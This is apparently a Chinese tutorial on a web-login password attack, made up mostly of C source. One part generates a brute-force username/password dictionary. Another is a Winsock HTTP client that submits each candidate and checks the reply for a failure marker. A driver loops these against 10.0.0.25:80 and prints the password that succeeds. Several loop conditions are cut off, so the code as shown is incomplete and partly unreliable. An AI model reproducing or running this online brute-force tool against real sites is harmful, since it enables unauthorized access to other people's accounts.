基于网页的口令攻击的实现
1、攻击字典实现(简单实现,在已知口令位数前提下,且限制字典库口令数目):
#include
#include
#include
// Lengths of the generated user-name and password fields.
// NOTE(review): neither macro is referenced in the code shown here; makeone_usps()
// hard-codes 7 and 9 instead.
#define USERLEN 7
#define PASSLEN 9
// Size in bytes of table[] below. The string literal holds 62 characters, so this
// value also counts the terminating NUL (table[62] == 0).
#define SIZEOFTABLE 63
// Alphabet the dictionary generator draws from: digits, then upper- and lower-case
// letters in keyboard-row order.
static char table[SIZEOFTABLE] = "1234567890QWERTYUIOPqwertyuiopasdfghjklASDFGHJKLmnbvcxzZXCVBNM";
// Increment one digit of the base-SIZEOFTABLE counter in place.
// Returns 1 when the digit wrapped back to 0 (the caller must carry into the
// next digit), 0 when no carry is needed.
int jinweiadd(int &count)
{
    count += 1;
    if (count != SIZEOFTABLE)
        return 0;

    // Reached the table size: reset this digit and report the carry.
    count = 0;
    return 1;
}
// Add one to the 16-digit counter held in count[], least-significant digit
// first. Carries propagate upward until a digit does not wrap; a carry out of
// digit 15 is dropped.
void addcount(int count[16])
{
    int digit = 0;
    while (digit < 16 && jinweiadd(count[digit]) != 0)
        digit++;
}
//
// Write the dictionary file "./字典.txt": one 35-byte line per candidate of the
// form "username=<7 chars>&password=<9 chars>", each followed by "\r\n".
// The 16 characters come from table[], indexed by a 16-digit counter whose
// first 7 digits select the user name and last 9 the password.
// Generation stops when digit 15 reaches SIZEOFTABLE-1 or after 0xfffffff
// increments, whichever comes first.
// NOTE(review): the result of fopen() is not checked before it is written to.
// NOTE(review): a digit value of SIZEOFTABLE-1 selects table[62], which is the
// literal's terminating NUL, so such lines contain a 0 byte.
void makeone_usps()
{
    const char *prefix = "username=";
    const char *middle = "&password=";
    const char *path = "./字典.txt";
    const char lineend[2] = {'\r','\n'};
    char line[40] = {0};
    int digits[16] = {0};   // counter, least-significant digit first
    unsigned emitted = 0;

    FILE *out = fopen(path, "wb");
    for (;;)
    {
        int pos = 0;

        // "username=" (9 bytes), then the 7 user-name characters.
        for (int k = 0; k < 9; k++)
            line[pos++] = prefix[k];
        for (int k = 0; k < 7; k++)
            line[pos++] = table[digits[k]];

        // "&password=" (10 bytes), then the 9 password characters.
        for (int k = 0; k < 10; k++)
            line[pos++] = middle[k];
        for (int k = 7; k < 16; k++)
            line[pos++] = table[digits[k]];

        line[pos] = 0;   // pos is 35 here; the terminator itself is not written out

        fwrite(line, sizeof(char), 35, out);
        fwrite(lineend, sizeof(char), 2, out);

        if (digits[15] == SIZEOFTABLE - 1)
            break;
        addcount(digits);

        emitted++;
        if (emitted == 0xfffffff)
            break;
    }
    fclose(out);
}
// Read one line of the dictionary file "./字典.txt" into usrpas and advance count.
// usrpas: output buffer; its first 65 bytes are cleared and then filled up to the
//         next '\r' (the caller in this file passes a 65-byte array).
// count:  zero-based index of the line to fetch; incremented by one before returning.
// The file is reopened and read from the start on every call.
// NOTE(review): fopen() and fread() results are not checked; if the file ends early,
// mid keeps its previous value and the loops below do not see end-of-file.
// NOTE(review): a line of 65 or more bytes before '\r' leaves usrpas without a
// terminating 0.
void getone_usps(char usrpas[],unsigned long &count)//count is zero-based
{
unsigned long i=0;
char mid;
FILE *fp;
char *filename = "./字典.txt";
fp = fopen(filename,"rb");
// Skip lines by counting '\n' bytes.
// NOTE(review): the loop condition is cut off on this page (the text after '<' was
// lost in extraction); presumably it compares i with count -- confirm against the
// original listing.
while(i
{
fread(&mid,sizeof(char),1,fp);
if(mid == '\n')
i++;
}
// Clear the output buffer so the copied line ends up 0-terminated.
for(i=0;i<65;i++)
{
usrpas[i]=0;
}
// Copy bytes until the '\r' that starts the line ending.
for(i=0;i<65;i++)
{
fread(&mid,sizeof(char),1,fp);
if(mid == '\r')
break;
usrpas[i]=mid;
}
fclose(fp);
count++;
}
2、HTTP协议实现客户端:
#include
#include
#pragma comment(lib,"ws2_32.lib")
// Classify a server response held in buffer.
// From offset 0x182 the buffer is searched, two bytes at a time, for the ASCII
// text "red". If it is found and the two bytes located 8 positions after the 'r'
// are 0xB2 0xBB, the function returns 0; in every other case, including when
// "red" is not found below offset 1024, it returns 1 (treated as a match by the
// caller).
// NOTE(review): 0xB2 0xBB looks like a double-byte (GBK) character taken from the
// server's failure page -- confirm against the page being parsed.
// NOTE(review): the reads at pos+1, pos+2, marker and marker+1 are not checked
// against the 1024-byte limit the search loop uses, so a hit near the end of the
// buffer reads past that limit.
// NOTE(review): because the position advances by 2, "red" at an odd distance from
// 0x182 is never seen; this looks unintentional -- confirm.
int compare(char buffer[])
{
    unsigned int pos = 0x182;
    while (pos < 1024)
    {
        if (buffer[pos] == 'r' && buffer[pos + 1] == 'e' && buffer[pos + 2] == 'd')
            break;
        pos += 2;
    }

    // Search ran off the end without a hit.
    if (pos == 1024)
        return 1;

    unsigned int marker = pos + 8;
    unsigned int first = (unsigned int)buffer[marker] & 0xff;
    unsigned int second = (unsigned int)buffer[marker + 1] & 0xff;

    return (first == 0xb2 && second == 0xbb) ? 0 : 1;
}
// Send one request carrying usrpas to ServerIPAddr:ServerPort and classify the reply.
// The request is the content of "./前奏.txt" followed by usrpas. One TCP connection
// is opened per call, the request is sent, a single recv() of up to 1024 bytes is
// read and handed to compare().
// Returns 1 when compare() returns 1; returns -1 otherwise, including on any
// Winsock failure.
// NOTE(review): the error returns below leave without closesocket()/WSACleanup().
int testonce(char *usrpas,char ServerIPAddr[],int ServerPort)
{
int flag = -1;
FILE *fp;//,*fp1,*fp2;
int i=0,j=0;
//WSAData structure
WSADATA wsaData;
//client socket handle
SOCKET ClientSocket;
//server address
SOCKADDR_IN ServerAddr;
//data to send
char SendData[1024];
// NOTE(review): fopen() is not checked, and the read loop has no bound against the
// 1024-byte SendData buffer.
fp = fopen("./前奏.txt","rb");
while(!feof(fp))
{
fread(&SendData[i],sizeof(char),1,fp);
i++;
}
// feof() only turns true after a failed read, so the loop counts one byte too many.
i--;
int midsize = strlen(usrpas);
// Append usrpas after the file content.
// NOTE(review): the loop condition is cut off on this page (the text after '<' was
// lost in extraction); presumably it compares j with midsize -- confirm against the
// original listing. Nothing visible bounds i against sizeof(SendData).
for(j = 0;j
{
SendData[i] = usrpas[j];
i++;
}
SendData[i] = 0;
fclose(fp);
char ReceiveBuffer[1024] = "";
int SendLength = -1;
int Result = -1;
//initialise Winsock
if((Result = WSAStartup(MAKEWORD(2,2),&wsaData))!=0)
{
printf("WSAStartup 失败!错误代码:%d\n",Result);
return -1;
}
ClientSocket = socket(AF_INET,//protocol family
SOCK_STREAM,//stream socket type
IPPROTO_TCP);//TCP protocol
// NOTE(review): SOCKET is an unsigned type in Winsock, so this comparison presumably
// never fires; the documented failure value is INVALID_SOCKET -- confirm.
if(ClientSocket<0)
{
printf("socket 失败!错误代码:%d\n",WSAGetLastError());
return -1;
}
memset(&ServerAddr,0,sizeof(ServerAddr));
//fill in SOCKADDR_IN
//it holds the server's IP address and port
//protocol family is AF_INET
ServerAddr.sin_family = AF_INET;
//set the server port
ServerAddr.sin_port = htons(ServerPort);
//set the server IP address
ServerAddr.sin_addr.s_addr = inet_addr(ServerIPAddr);
//connect to the server
Result = connect(ClientSocket,//socket handle
(SOCKADDR*)&ServerAddr,//server address
sizeof(ServerAddr));//length of the address structure
if(Result<0)
{
printf("连接失败!错误代码:%d\n",WSAGetLastError());
return -1;
}
//send the data
SendLength = send(ClientSocket,//socket handle
SendData,//send buffer
strlen(SendData),//length
0);//flags are 0
if(SendLength<0)
{
printf("发送失败!错误代码:%d\n",WSAGetLastError());
return -1;
}
//(disabled debug output: print the data that was sent)
int ReceiveLen;
//clear the buffer
memset(ReceiveBuffer,0,sizeof(ReceiveBuffer));
//receive data
// NOTE(review): a single recv() may return only part of the response, and a full
// 1024-byte read leaves no terminating 0; compare() then works on whatever arrived.
if((ReceiveLen = recv(ClientSocket,ReceiveBuffer,1024,0))<0)
{
printf("接收失败!错误代码:%d\n",WSAGetLastError());
return -1;
}
else
{
//(disabled debug output: print the received data)
if(compare(ReceiveBuffer)==1)
flag=1;
}
if(closesocket(ClientSocket)==SOCKET_ERROR)
{
printf("关闭socket失败错误代码是%d\n",WSAGetLastError());
}
//release Winsock
if(WSACleanup() == SOCKET_ERROR)
{
printf("释放Winsock失败错误代码是%d\n",WSAGetLastError());
}
return flag;
}
3、三次握手验证口令:
#include "Httptest.h"
#include "dic.h"
#include
// File-scope state shared by main() and the progress thread.
// NOTE(review): semfile1, semfile2, threadnum, numcount, result and threadend are
// not referenced anywhere in the code shown on this page.
int semfile1 = 0;
int semfile2 = 0;
// Zero-based index of the next dictionary line; advanced by getone_usps().
unsigned long count=0;
int threadnum=0;
int numcount=0;
// 0 while the run is in progress; main() sets 1 on a match and 2 when count reaches
// the dictionary size. Read by thread() to decide when to stop.
// NOTE(review): written by main() and read by thread() with no synchronisation and
// no volatile/atomic qualifier.
int success = 0;
char result[90];
int threadend=0;
// Progress indicator run on its own thread: while success is 0 it clears the
// console and prints "wait." through "wait....", pausing 250 ms after each
// frame. As soon as success is non-zero it clears the console once more and
// returns 1. The ptheread argument is not used.
// NOTE(review): success is a plain global written by another thread; nothing
// here makes the read atomic or volatile.
DWORD WINAPI thread(LPVOID ptheread)
{
    static const char *const frames[4] = {"wait.", "wait..", "wait...", "wait...."};

    while (success == 0)
    {
        for (int k = 0; k < 4; k++)
        {
            system("cls");
            if (success != 0)
            {
                // Result arrived mid-cycle: final clear, then stop.
                system("cls");
                return 1;
            }
            printf("%s", frames[k]);
            _sleep(250);
        }
    }
    system("cls");
    return 1;
}
// Driver: starts the progress thread, then fetches dictionary lines one at a time
// with getone_usps() and submits each through testonce() to 10.0.0.25:80 (a
// private-range address) until one is reported as matching or numofdic lines have
// been used.
// Candidates are tried strictly one after another, each over a fresh connection made
// by testonce(); seen from the server this is a run of failed logins from a single
// client address, which is what login rate limiting and lockout thresholds key on.
void main()
{
char usrpas[65]="";
char ServerIPAddr[50] = "10.0.0.25";
int ServerPort = 80;
// Number of dictionary lines to try.
unsigned long numofdic=13;
DWORD threadid;
// NOTE(review): the thread handle returned by CreateThread() is discarded.
CreateThread(0,0,thread,0,0,&threadid);
// NOTE(review): the loop condition is cut off on this page (the text after '<' was
// lost in extraction); judging by the check after the loop it presumably compares
// count with numofdic -- confirm against the original listing.
while(count
{
getone_usps(usrpas,count);
int flag = testonce(usrpas,ServerIPAddr,ServerPort);
if(flag==1)
{
success = 1;
//(disabled: print the matching pair here)
break;
}
}
// NOTE(review): getone_usps() has already incremented count, so a match on the last
// line also satisfies this test and success is overwritten with 2.
if(count == numofdic)
success = 2;
// Give the progress thread time to see the new value and clear the console.
_sleep(500);
if(success == 1)
printf("成功密码为%s\n",usrpas);
else
printf("字典库中无合适的用户名密码\n");
return;
}